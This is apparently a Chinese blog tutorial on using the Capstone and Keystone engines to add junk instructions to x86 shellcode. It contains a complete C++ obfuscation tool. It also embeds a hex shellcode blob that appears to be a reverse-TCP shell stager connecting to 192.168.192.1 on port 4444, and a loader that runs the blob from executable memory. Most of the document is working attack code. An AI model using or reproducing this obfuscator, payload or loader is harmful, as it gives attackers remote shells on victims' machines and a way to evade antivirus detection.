Capstone+Keystone实现花指令

0.简介

汇编和反汇编的过程,就是硬编码(二进制机器码)和汇编指令之间的相互转化。最直白的方式,就是直接查intel的白皮书,具体转换方法可以参考《二进制入门学习笔记-14.windows硬编码》。自己翻手册实现这个过程显然很繁琐,不过好在已经有KeystoneCapstone两大神器实现了需求。

  • Capstone:目前世界上最优秀的反汇编引擎,ida工具都是使用的该反汇编引擎。可以快速将硬编码转换为汇编语句。详情见Capstone官网
  • Keystone:开源的轻量级多平台、多架构汇编框架,可以实现从汇编语句转换为硬编码。详情见Keystone官网

1.开发环境配置

所用编辑器为Microsoft Visual Studio2019,操作系统为Win10 X64。

1.1 Capstone开发环境

Capstone安装非常简单,Github仓库中选取所需要release版本即可,这里我下载的是64位版本的。解压完成后即可看到如下文件: 这里的lib文件和dll文件是可以直接在我目前的开发环境下使用。include文件夹中包含的capstone文件夹中,还有开发时所需要的头文件。我这里使用的静态链接库开发,开发时只需将capstone.libinclude/capstone文件夹拖入项目并导入即可。

1.2 Keystone开发环境

Keystone官方提供的版本编译环境较为老旧,无法在当前环境下使用。需要自己重新编译,下载源码包并解压。这里我想要编译x64的lib,因此使用x64 Native Tools Command Prompt for VS 2019进行编译。 编译方法如下:

cd C:\Users\crls\Desktop\keystone-0.9.1
mkdir build
cd build
..\nmake-lib.bat

编译完成后会在build\llvm\lib目录下生成keystone.lib文件。 使用时,将该keystone.lib文件和/include/目录下的keystone目录均复制到项目文件夹并导入即可。

1.3 测试开发环境

新建一个空项目,并导入所需的lib库和头文件。 主文件中写入如下代码:

#include <iostream>
#include <stdio.h>
#include <cinttypes>  
#include "capstone/capstone.h"
#include "keystone/keystone.h"
using namespace std;

#define CODE1 "\x41\x4a\xb8\x78\x56\x34\x12"
#define CODE2 "INC ecx; DEC edx;mov eax,0x12345678"
void testCapstone(void)
{
    csh handle;
    cs_insn* insn;
    size_t count;
    if (cs_open(CS_ARCH_X86, CS_MODE_32, &handle)) {
        printf("ERROR: Failed to initialize engine!\n");
    }
    count = cs_disasm(handle, (unsigned char*)CODE1, sizeof(CODE1) - 1, 0x1000, 0, &insn);
    if (count) {
        size_t j;

        for (j = 0; j < count; j++) {
            printf("0x%""Ix"":\t%s\t\t%s\n", insn[j].address, insn[j].mnemonic, insn[j].op_str);
        }

        cs_free(insn, count);
    }
    else
        printf("ERROR: Failed to disassemble given code!\n");

    cs_close(&handle);
}
void testKeystone(void)
{
    ks_engine* ks;
    ks_err err;
    size_t count;
    unsigned char* encode;
    size_t size;

    err = ks_open(KS_ARCH_X86, KS_MODE_32, &ks);
    if (err != KS_ERR_OK) {
        printf("ERROR: failed on ks_open(), quit\n");
    }

    if (ks_asm(ks, CODE2, 0, &encode, &size, &count) != KS_ERR_OK) {
        printf("ERROR: ks_asm() failed & count = %lu, error = %u\n",
            count, ks_errno(ks));
    }
    else {
        size_t i;

        printf("%s = ", CODE2);
        for (i = 0; i < size; i++) {
            printf("%02x ", encode[i]);
        }
        printf("\n");
        printf("Compiled: %lu bytes, statements: %lu\n", size, count);
    }

    // NOTE: free encode after usage to avoid leaking memory
    ks_free(encode);

    // close Keystone instance when done
    ks_close(ks);
}
int main(int argc, char** argv) {
    printf("------------Capstone测试结果------------\n");
    testCapstone();
    printf("------------Capstone测试结果------------\n");
    printf("\n\n");
    printf("------------Keystone测试结果------------\n");
    testKeystone();
    printf("------------Keystone测试结果------------\n");
}

运行结果如下:

2.实现代码

以下代码参考了别人Python版本的思路。先把shellcode转换成字符串形式的汇编指令。然后遍历每一条汇编指令,给每一个跳转点都起上名字,通过这个名字进行跳转。然后添加花指令,再使用keystone将字符串形式的汇编指令转换成shellcode。

#include <iostream>
#include <stdio.h>
#include <cinttypes>  
#include "capstone/capstone.h"
#include "keystone/keystone.h"
#include <string.h>
using namespace std;


string getOpCodeFromAssemblyCode(string assemblyCode)
{
    string res;
    ks_engine* ks;
    ks_err err;
    size_t count;
    unsigned char* encode;
    size_t size;

    err = ks_open(KS_ARCH_X86, KS_MODE_32, &ks);
    if (err != KS_ERR_OK) {
        printf("ERROR: failed on ks_open(), quit\n");
    }

    if (ks_asm(ks, assemblyCode.data(), 0, &encode, &size, &count) != KS_ERR_OK) {
        printf("ERROR: ks_asm() failed & count = %lu, error = %u\n",
            count, ks_errno(ks));
    }
    else {
        size_t i;
        for (i = 0; i < size; i++) {
            char szTmp[3];
            sprintf_s(szTmp, "%02x", encode[i]);
            res += "\\x";
            res += szTmp;
            //printf("\\x%02x", encode[i]);
        }
        //printf("\n");
        //printf("Compiled: %lu bytes, statements: %lu\n", size, count);
        ks_free(encode);
        ks_close(ks);
        return res;
    }
}
int offSetToIndex(int offset, int assemblyCodeLength, int opCodeLenArray[]) {
    int index = 0;
    //printf("assemblyCodeLength:%d\n",assemblyCodeLength);
    for (int i = 0; i < assemblyCodeLength;i++) {
        //cout << i << " : offset: " << offset << "insn[i].size: "<< opCodeLenArray[i]<<endl;
        offset = offset - opCodeLenArray[i];
        index += 1;
        if (offset == 0) {
            return index;
        }
    }
}
void addThunkCode(char CODE1[], int codeLen, string tunkCode)
{
    string controlflow[] = { "jmp", "jz", "jnz", "je", "jne", "call", "jl", "ja", "loop", "jecxz", "jle", "jge", "jg", "jp", "jnl" };
    string registers[] = { "eax", "ecx","edx", "ebx", "esp", "ebp", "esi", "edi" };
    string assemblyCodeArray[4000];//存储汇编代码
    int opCodeLenArray[4000];//存储每条汇编指令opcode的长度
    int assemblyCodeWithControlflow[4000];//存储包含控制流的汇编代码编号
    int numOfAssemblyCodeWithControlflow = 0;
    int numOfassemblyCodeToJumpTo = 0;
    int assemblyCodeToJumpTo[4000];
    size_t assemblyCodeLength=0;
    /*---获取反汇编结果数组assemblyCodeArray---*/
    csh handle;
    cs_insn* insn;
    if (cs_open(CS_ARCH_X86, CS_MODE_32, &handle)) {
        printf("ERROR: Failed to initialize engine!\n");
    }
    cs_option(handle, CS_OPT_SKIPDATA, CS_OPT_ON);//跳过数据
    assemblyCodeLength = cs_disasm(handle, (unsigned char*)CODE1, codeLen - 1, 0x0, 0, &insn);
    if (assemblyCodeLength) {
        for (size_t i = 0; i < assemblyCodeLength; i++) {
            /*
            printf("0x%""Ix"":\t%s\t\t%s\t", insn[i].address, insn[i].mnemonic, insn[i].op_str);
            for (int k = 0; k < insn[i].size; k++) {
                printf("/x%x", insn[i].bytes[k]);
            }
            printf("\n");
            */
            opCodeLenArray[i] = insn[i].size;
            assemblyCodeArray[i] = insn[i].mnemonic;
            assemblyCodeArray[i] += " ";
            if (strlen(insn[i].op_str)==1) {//防止奇葩情况,如果是一位数没有0x
                assemblyCodeArray[i] += "0x";
            }
            assemblyCodeArray[i] += insn[i].op_str;
        }
        printf("------1.反汇编结果------\n");
        for (size_t i = 0; i < assemblyCodeLength; i++) {
            printf("%d:  %s\n", i, assemblyCodeArray[i].data());
        }
        printf("------1.反汇编结果------\n\n\n");
    }
    else {
        printf("ERROR: Failed to disassemble given code!\n");
    }
    /*获取反汇编结果数组assemblyCodeArray*/

    printf("-------查找跳转指令-------\n");
    /*获取所有包含跳转但操作数不是寄存器的汇编代码编号*/
    for (int i = 0; i < assemblyCodeLength; i++) {
        bool hasControlflow = false;//保存汇编代码中是否包含跳转代码
        bool hasRegisters = false;//保存汇编代码中是否包含寄存器
        for (int j = 0; j < (sizeof(controlflow)/sizeof(controlflow[0])); j++) {
            if (assemblyCodeArray[i].find(controlflow[j])!=-1) {
                hasControlflow = true;
                string tmpOpst=insn[i].op_str;
                for (int k = 0; k < (sizeof(registers) / sizeof(registers[0])); k++) {
                    if (tmpOpst.find(registers[k]) != -1) {
                        hasRegisters = true;
                    }
                }
            }
        }
        if ((hasControlflow == true) && (hasRegisters == false)) {
            assemblyCodeWithControlflow[numOfAssemblyCodeWithControlflow] = i;
            printf("发现第%d行汇编代码中包含跳转指令,汇编代码为:%s\n", assemblyCodeWithControlflow[numOfAssemblyCodeWithControlflow], assemblyCodeArray[i]);
            numOfAssemblyCodeWithControlflow++;
        }
    }
    printf("-------查找跳转指令-------\n\n");
    /*获取所有包含跳转但操作数不是寄存器的汇编代码编号*/


    /*给所有被跳转到的位置加上一个名字,并使用名字完成跳转*/
    printf("-------对跳转到的位置标签化-------\n");
    for (int i = 0; i < numOfAssemblyCodeWithControlflow; i++) {
        int pos = -1; //0x的位置
        int offSet = -1;//原始的偏移
        int index = -1; //跳转对应汇编代价的序号
        string tmpAssemblyCode;
        tmpAssemblyCode = assemblyCodeArray[assemblyCodeWithControlflow[i]];
        pos = tmpAssemblyCode.find("0x");
        offSet = atof(tmpAssemblyCode.substr(pos,tmpAssemblyCode.length()).c_str());
        index = offSetToIndex(offSet, assemblyCodeLength, opCodeLenArray);
        char strIndex[1000];//存储字符串形式的index
        _itoa_s(index, strIndex, 10);

        //将跳转位置替换成标签
        tmpAssemblyCode = assemblyCodeArray[assemblyCodeWithControlflow[i]].substr(0,pos);
        tmpAssemblyCode += "jus4fun";
        tmpAssemblyCode += strIndex;
        assemblyCodeArray[assemblyCodeWithControlflow[i]] = tmpAssemblyCode;
        //判断跳转到的位置是否已经添加标签
        bool isAddName = false;
        for (int j = 0; j < numOfassemblyCodeToJumpTo; j++) {
            if (assemblyCodeToJumpTo[j] == index) {
                isAddName = true;
            }
        }
        if (!isAddName) {
            assemblyCodeToJumpTo[numOfassemblyCodeToJumpTo] = index;
            string tmpAssemblyCode = "jus4fun";
            tmpAssemblyCode += strIndex;
            tmpAssemblyCode += ": ";
            tmpAssemblyCode += assemblyCodeArray[index];
            assemblyCodeArray[index] = tmpAssemblyCode;
            printf("对第%d行跳转到的代码进行标签化中,标签化结果为%s\n", index, tmpAssemblyCode.c_str());
            numOfassemblyCodeToJumpTo++;
        }
        //printf("第%d行的跳转进行标签中,跳转对应代码位置为:%d\n", assemblyCodeWithControlflow[i], index);
    }
    printf("已对%d行代码完成标签化\n", numOfassemblyCodeToJumpTo);
    printf("-------对跳转到的位置标签化-------\n");
    /*给所有被跳转到的位置加上一个名字*/

    /*添加花指令*/
    string assemblyCodeRes;
    for (size_t i = 0; i < assemblyCodeLength; i++) {
        assemblyCodeRes += assemblyCodeArray[i];
        assemblyCodeRes += ";";
        assemblyCodeRes += tunkCode;
        printf("%d:  %s\n", i, assemblyCodeArray[i].data());
    }
    printf("\n\n------添加花指令后的代码汇编代码如下------\n");
    printf("%s",assemblyCodeRes.data());
    /*添加花指令*/

    /*输出加花后的硬编码*/
    printf("\n\n------添加花指令后的硬编码如下------\n");
    cout << getOpCodeFromAssemblyCode(assemblyCodeRes) << endl;
    /*输出加花后的硬编码*/

    /*释放打开的句柄*/
    cs_free(insn, assemblyCodeLength);
    cs_close(&handle);
    /*释放打开的句柄*/

}
int main(int argc, char** argv) {
    char CODE1[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc0\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
    int codeLen = sizeof(CODE1);
    string tunkCode = "NOP;";
    addThunkCode(CODE1, codeLen, tunkCode);
}

使用如下代码对加花前和加花后代码做简单的加载器进行测试:

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main()
{
    char str[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc0\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
    void* exec = VirtualAlloc(0,sizeof(str),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    memcpy(exec,str,sizeof(str));
    ((void(*)())exec)();
}

结果如下: